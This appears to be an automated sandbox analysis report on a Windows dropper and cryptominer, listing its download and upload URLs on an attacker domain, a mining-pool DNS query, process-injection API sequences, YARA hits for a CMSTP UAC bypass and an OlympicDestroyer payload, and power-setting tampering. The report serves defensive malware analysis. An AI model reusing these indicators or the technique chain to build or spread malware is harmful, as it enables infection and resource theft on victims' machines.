                        Source: global trafficDNS traffic detected: DNS query: pool.hashvault.pro
                        Source: unknownHTTP traffic detected: POST /66/api/endpoint.php HTTP/1.1Accept: */*Connection: closeContent-Length: 307Content-Type: application/jsonHost: woo097878781.winUser-Agent: cpp-httplib/0.12.6
                        Source: WindosCPUsystem.exe, 00000008.00000003.2430713857.000001BBFD920000.00000004.00000001.00020000.00000000.sdmp, ggbfqxmgkimt.sys.8.drString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
                        Source: WindosCPUsystem.exe, 00000008.00000003.2430713857.000001BBFD920000.00000004.00000001.00020000.00000000.sdmp, ggbfqxmgkimt.sys.8.drString found in binary or memory: http://crl.globalsign.net/Root.crl0
                        Source: WindosCPUsystem.exe, 00000008.00000003.2430713857.000001BBFD920000.00000004.00000001.00020000.00000000.sdmp, ggbfqxmgkimt.sys.8.drString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
                        Source: WindosCPUsystem.exe, 00000008.00000003.2430713857.000001BBFD920000.00000004.00000001.00020000.00000000.sdmp, ggbfqxmgkimt.sys.8.drString found in binary or memory: http://crl.globalsign.net/primobject.crl0
                        Source: explorer.exe, 00000020.00000003.3390678126.0000000002C2F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3390824384.0000000000739000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.i.lencr.org/0
                        Source: explorer.exe, 00000020.00000003.3390678126.0000000002C2F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3390824384.0000000000739000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.o.lencr.org0#
                        Source: explorer.exe, 00000020.00000003.3390678126.0000000002C2F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.4654016391.0000000002C28000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3390678126.0000000002C29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3768810420.0000000002C2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/
                        Source: explorer.exe, 00000020.00000003.3390678126.0000000002C2F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3390756248.0000000002C39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                        Source: explorer.exe, 00000020.00000003.3768810420.0000000002C50000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3390756248.0000000002C50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/=
                        Source: explorer.exe, 00000020.00000003.3390678126.0000000002C29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/
                        Source: explorer.exe, 00000020.00000003.3390678126.0000000002C2F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3768810420.0000000002C50000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3390756248.0000000002C50000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3390756248.0000000002C39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                        Source: explorer.exe, 00000020.00000003.3390678126.0000000002C29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/3R
                        Source: explorer.exe, 00000020.00000003.2443389912.0000000000739000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win
                        Source: explorer.exe, 00000004.00000003.2270189206.0000000000B4C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2875477141.000000000385D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2887715751.000000000385D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2885657484.000000000385D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/
                        Source: file.exeString found in binary or memory: https://woo097878781.win/32.EXE
                        Source: file.exeString found in binary or memory: https://woo097878781.win/32.EXEhttps://woo097878781.win/64.EXEhttps://woo097878781.win/upload.php66M
                        Source: explorer.exe, explorer.exe, 00000004.00000003.2203432137.0000000000B29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3101400503.0000000000B47000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2396860265.0000000000B56000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2178464277.0000000000B29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4653721171.0000000000B48000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2190178303.0000000000B29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2168797360.0000000000B29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2396889180.0000000000B4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/64.EXE
                        Source: file.exe, 00000000.00000003.2116236371.0000000002875000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/64.EXEhttps://woo097878781.win/upload.php66Mozilla/5.0
                        Source: explorer.exe, 00000020.00000002.4653016535.00000000006D7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2475569173.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3768529697.000000000072C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/66/api/endpoint.php
                        Source: explorer.exe, 00000020.00000002.4653016535.00000000006D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/66/api/endpoint.php--cinit-version=3.4.1--tls--cinit-idle-wait=5--cinit-idl
                        Source: explorer.exe, 00000020.00000003.2475407656.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3390824384.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2443389912.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.4653016535.000000000072C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2475569173.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3768529697.000000000072C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/66/api/endpoint.php1=
                        Source: explorer.exe, 00000020.00000002.4653016535.0000000000699000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/66/api/endpoint.phpK
                        Source: explorer.exe, 00000020.00000003.2443389912.0000000000739000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/66/api/endpoint.phpQ=C
                        Source: explorer.exe, 00000021.00000003.2875477141.000000000385D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2887715751.000000000385D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2885657484.000000000385D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/U
                        Source: file.exe, 00000000.00000003.2116236371.0000000002870000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4654386934.0000000002C07000.00000004.00000010.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2396889180.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2234164355.0000000000AD2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3044272983.0000000002ED9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2233935293.0000000000B20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/WindosCPUsystem.exe
                        Source: explorer.exe, 00000004.00000003.3104820467.0000000002EEF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3772296676.0000000002EEE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4654526763.0000000002EDF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3044272983.0000000002EEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/WindosCPUsystem.exeWindowsSystem1
                        Source: file.exeString found in binary or memory: https://woo097878781.win/WindosCPUsystem.exeWindowsSystem1WindosCPUsystem.exe
                        Source: explorer.exe, 00000004.00000003.2234164355.0000000000AD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/WindosCPUsystem.exey
                        Source: explorer.exe, 00000004.00000003.2270189206.0000000000B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/Z
                        Source: explorer.exe, 00000021.00000003.2875477141.000000000385D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2887715751.000000000385D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2885657484.000000000385D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/i
                        Source: explorer.exe, 00000004.00000003.2234164355.0000000000AD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/p
                        Source: explorer.exe, 00000021.00000002.2886931990.0000000001183000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/qS
                        Source: explorer.exe, 00000021.00000003.2875477141.000000000385D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2887715751.000000000385D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2885657484.000000000385D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/r
                        Source: explorer.exe, 00000021.00000003.2875477141.000000000385D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2887715751.000000000385D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2885657484.000000000385D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/ra
                        Source: explorer.exe, explorer.exe, 00000024.00000002.4590293308.0000000002AD8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/upload.php
                        Source: explorer.exe, 00000021.00000003.2847225481.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2887033059.0000000001240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/upload.php3
                        Source: explorer.exe, 00000004.00000003.2396889180.0000000000B4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/v
                        Source: explorer.exe, 00000004.00000003.3101400503.0000000000B47000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4653721171.0000000000B48000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2396889180.0000000000B4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win:443/64.EXE
                        Source: explorer.exe, 00000004.00000003.2234164355.0000000000ACB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win:443/WindosCPUsystem.exeD9D
                        Source: explorer.exe, 00000021.00000003.2847225481.000000000121B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2887033059.000000000121B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2847508835.000000000121B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2886931990.00000000011A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win:443/upload.php
                        Source: explorer.exe, 00000020.00000003.2443389912.0000000000739000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.winPTt
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                        Source: unknownHTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.6:49708 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.6:49712 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.6:49738 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.6:49756 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.6:49775 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.6:49804 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.6:49823 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.6:49857 version: TLS 1.2
                        Source: C:\Windows\explorer.exeCode function: 4_2_00BF2310 WaitForSingleObject,RtlExitUserThread,GetAsyncKeyState,Sleep,OpenEventW,SetEvent,CloseHandle,RtlExitUserThread,4_2_00BF2310
                        Source: explorer.exe, 00000004.00000002.4654714736.0000000003790000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ENCMARK RegisterRawInputDevicesmemstr_4bb8ffd0-5

                        Operating System Destruction

                        barindex
                        Protects its processes via BreakOnTermination flag
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess information set: 01 00 00 00 Jump to behavior

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: file.exe, type: SAMPLEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 4.2.explorer.exe.be0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 0.0.file.exe.7c0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 0.2.file.exe.7c0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 36.2.explorer.exe.29f0000.0.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
                        Source: 35.2.explorer.exe.27b0000.0.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
                        Source: 33.2.explorer.exe.1390000.0.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
                        Uses powercfg.exe to modify the power settings
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                        Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D38D0 GetCurrentProcess,Wow64DisableWow64FsRedirection,_memset,lstrcpyW,_memset,CreateProcessW,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,_memmove,_memmove,_memmove,lstrcpyW,lstrcpyW,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,_memmove,CreateEventW,GetModuleHandle64,GetProcAddress64,X64Call,WaitForSingleObject,ResetEvent,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtClose,CloseHandle,Wow64DisableWow64FsRedirection,ResetEvent,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,CloseHandle,CloseHandle,Wow64DisableWow64FsRedirection,0_2_007D38D0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007CA1B0 GetCurrentProcess,_memset,CreateProcessW,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,_memmove,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,_memmove,NtMapViewOfSection,_memset,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,CloseHandle,CloseHandle,0_2_007CA1B0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D44B0 CreateProcessW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,_memmove,LoadLibraryW,GetProcAddress,GetProcAddress,lstrcpyW,lstrcpyW,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,_memmove,CreateEventW,RtlCreateUserThread,WaitForSingleObject,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtClose,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,TerminateProcess,CloseHandle,CloseHandle,0_2_007D44B0
                        Source: C:\Windows\explorer.exeCode function: 4_2_00BF0740 CreateProcessW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,LoadLibraryW,GetProcAddress,GetProcAddress,lstrcpyW,lstrcpyW,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,CreateEventW,RtlCreateUserThread,WaitForSingleObject,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtClose,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,TerminateProcess,CloseHandle,CloseHandle,4_2_00BF0740
                        Source: C:\Windows\explorer.exeCode function: 4_2_00BF11A4 CloseHandle,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,TerminateProcess,CloseHandle,CloseHandle,4_2_00BF11A4
                        Source: C:\Windows\explorer.exeCode function: 4_2_00BE7940 GetCurrentProcess,CreateProcessW,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,GetThreadContext,SetThreadContext,ResumeThread,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,CloseHandle,CloseHandle,TerminateProcess,4_2_00BE7940
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 8_2_00007FF60AA91394 NtCreateProcess,8_2_00007FF60AA91394
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeFile created: C:\Users\user\AppData\Local\Temp\ggbfqxmgkimt.sysJump to behavior
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E505A0_2_007E505A
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E48270_2_007E4827
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E58140_2_007E5814
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F01AF0_2_007F01AF
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F1B140_2_007F1B14
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007EFC5E0_2_007EFC5E
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E542C0_2_007E542C
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E4CBC0_2_007E4CBC
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F0DDC0_2_007F0DDC
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007DAED90_2_007DAED9
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D16900_2_007D1690
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007DAE800_2_007DAE80
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F07000_2_007F0700
                        Source: C:\Windows\explorer.exeCode function: 4_2_00BE10004_2_00BE1000
                        Source: C:\Windows\explorer.exeCode function: 4_2_00C022104_2_00C02210
                        Source: C:\Windows\explorer.exeCode function: 4_2_00BF9CB04_2_00BF9CB0
                        Source: C:\Windows\explorer.exeCode function: 4_2_00BE4DA04_2_00BE4DA0
                        Source: C:\Windows\explorer.exeCode function: 4_2_00C05D204_2_00C05D20
                        Source: C:\Windows\explorer.exeCode function: 4_2_00BE7EF04_2_00BE7EF0
                        Source: C:\Windows\explorer.exeCode function: 4_2_00BF07404_2_00BF0740
                        Source: C:\Windows\explorer.exeCode function: 4_2_00BEB8B04_2_00BEB8B0
                        Source: C:\Windows\explorer.exeCode function: 4_2_00C0E88C4_2_00C0E88C
                        Source: C:\Windows\explorer.exeCode function: 4_2_00BEE8C04_2_00BEE8C0
                        Source: C:\Windows\explorer.exeCode function: 4_2_00BEA8C04_2_00BEA8C0
                        Source: C:\Windows\explorer.exeCode function: 4_2_00C0F8344_2_00C0F834
                        Source: C:\Windows\explorer.exeCode function: 4_2_00C139FC4_2_00C139FC
                        Source: C:\Windows\explorer.exeCode function: 4_2_00BE79404_2_00BE7940
                        Source: C:\Windows\explorer.exeCode function: 4_2_00C152C84_2_00C152C8
                        Source: C:\Windows\explorer.exeCode function: 4_2_00BF12B04_2_00BF12B0
                        Source: C:\Windows\explorer.exeCode function: 4_2_00C0CAFC4_2_00C0CAFC
                        Source: C:\Windows\explorer.exeCode function: 4_2_00C022864_2_00C02286
                        Source: C:\Windows\explorer.exeCode function: 4_2_00C09BEC4_2_00C09BEC
                        Source: C:\Windows\explorer.exeCode function: 4_2_00BECBF04_2_00BECBF0
                        Source: C:\Windows\explorer.exeCode function: 4_2_00C15B2C4_2_00C15B2C
                        Source: C:\Windows\explorer.exeCode function: 4_2_00BFA4A04_2_00BFA4A0
                        Source: C:\Windows\explorer.exeCode function: 4_2_00BFC4914_2_00BFC491
                        Source: C:\Windows\explorer.exeCode function: 4_2_00BFACE04_2_00BFACE0
                        Source: C:\Windows\explorer.exeCode function: 4_2_00BFC4104_2_00BFC410
                        Source: C:\Windows\explorer.exeCode function: 4_2_00C165D84_2_00C165D8
                        Source: C:\Windows\explorer.exeCode function: 4_2_00BF26904_2_00BF2690
                        Source: C:\Windows\explorer.exeCode function: 4_2_00BEDE204_2_00BEDE20
                        Source: C:\Windows\explorer.exeCode function: 4_2_00C026604_2_00C02660
                        Source: C:\Windows\explorer.exeCode function: 4_2_00BFCFC04_2_00BFCFC0
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 8_2_00007FF60AA934808_2_00007FF60AA93480
                        Source: C:\Windows\explorer.exeCode function: 33_2_0139100033_2_01391000
                        Source: C:\Windows\explorer.exeCode function: 33_2_013993C033_2_013993C0
                        Source: C:\Windows\explorer.exeCode function: 33_2_013955D033_2_013955D0
                        Source: C:\Windows\explorer.exeCode function: 33_2_013934B033_2_013934B0
                        Source: C:\Windows\explorer.exeCode function: 33_2_0139664033_2_01396640
                        Source: C:\Windows\explorer.exeCode function: 33_2_01396E7033_2_01396E70
                        Source: C:\Windows\explorer.exeCode function: 33_2_014281A033_2_014281A0
                        Source: C:\Windows\explorer.exeCode function: 33_2_0145B0E033_2_0145B0E0
                        Source: C:\Windows\explorer.exeCode function: 33_2_013A629033_2_013A6290
                        Source: C:\Windows\explorer.exeCode function: 33_2_014502A033_2_014502A0
                        Source: C:\Windows\explorer.exeCode function: 33_2_0141651033_2_01416510
                        Source: C:\Windows\explorer.exeCode function: 33_2_013C05A033_2_013C05A0
                        Source: C:\Windows\explorer.exeCode function: 33_2_0141A41033_2_0141A410
                        Source: C:\Windows\explorer.exeCode function: 33_2_014384C033_2_014384C0
                        Source: C:\Windows\explorer.exeCode function: 33_2_0145148033_2_01451480
                        Source: C:\Windows\explorer.exeCode function: 33_2_0139A7A033_2_0139A7A0
                        Source: C:\Windows\explorer.exeCode function: 33_2_0145A67433_2_0145A674
                        Source: C:\Windows\explorer.exeCode function: 33_2_0145D6B833_2_0145D6B8
                        Source: C:\Windows\explorer.exeCode function: 33_2_0145090033_2_01450900
                        Source: C:\Windows\explorer.exeCode function: 33_2_0145B84C33_2_0145B84C
                        Source: C:\Windows\explorer.exeCode function: 33_2_0142282A33_2_0142282A
                        Source: C:\Windows\explorer.exeCode function: 33_2_0145AAF433_2_0145AAF4
                        Source: C:\Windows\explorer.exeCode function: 33_2_01451A9033_2_01451A90
                        Source: C:\Windows\explorer.exeCode function: 33_2_0144FDF033_2_0144FDF0
                        Source: C:\Windows\explorer.exeCode function: 33_2_01455DF033_2_01455DF0
                        Source: C:\Windows\explorer.exeCode function: 33_2_01454D9433_2_01454D94
                        Source: C:\Windows\explorer.exeCode function: 33_2_013ADC5033_2_013ADC50
                        Source: C:\Windows\explorer.exeCode function: 33_2_0139AF0033_2_0139AF00
                        Source: C:\Windows\explorer.exeCode function: 33_2_01450FC033_2_01450FC0
                        Source: C:\Windows\explorer.exeCode function: 33_2_01421F8F33_2_01421F8F
                        Source: C:\Windows\explorer.exeCode function: 33_2_01395E1033_2_01395E10
                        Source: C:\Windows\explorer.exeCode function: 33_2_0142FE7033_2_0142FE70
                        Source: C:\Windows\explorer.exeCode function: 33_2_0141EEC033_2_0141EEC0
                        Source: C:\Windows\explorer.exeCode function: 33_2_01453EB033_2_01453EB0
                        Source: C:\Windows\explorer.exeCode function: 33_2_013C3EC033_2_013C3EC0
                        Source: C:\Windows\explorer.exeCode function: 35_2_027B100035_2_027B1000
                        Source: C:\Windows\explorer.exeCode function: 35_2_027B664035_2_027B6640
                        Source: C:\Windows\explorer.exeCode function: 35_2_027B34B035_2_027B34B0
                        Source: C:\Windows\explorer.exeCode function: 35_2_027B6E7035_2_027B6E70
                        Source: C:\Windows\explorer.exeCode function: 35_2_027B5E1035_2_027B5E10
                        Source: C:\Windows\explorer.exeCode function: 35_2_028702A035_2_028702A0
                        Source: C:\Windows\explorer.exeCode function: 35_2_027C629035_2_027C6290
                        Source: C:\Windows\explorer.exeCode function: 35_2_027B93C035_2_027B93C0
                        Source: C:\Windows\explorer.exeCode function: 35_2_0287B0E035_2_0287B0E0
                        Source: C:\Windows\explorer.exeCode function: 35_2_028481A035_2_028481A0
                        Source: C:\Windows\explorer.exeCode function: 35_2_0287D6B835_2_0287D6B8
                        Source: C:\Windows\explorer.exeCode function: 35_2_0287A67435_2_0287A674
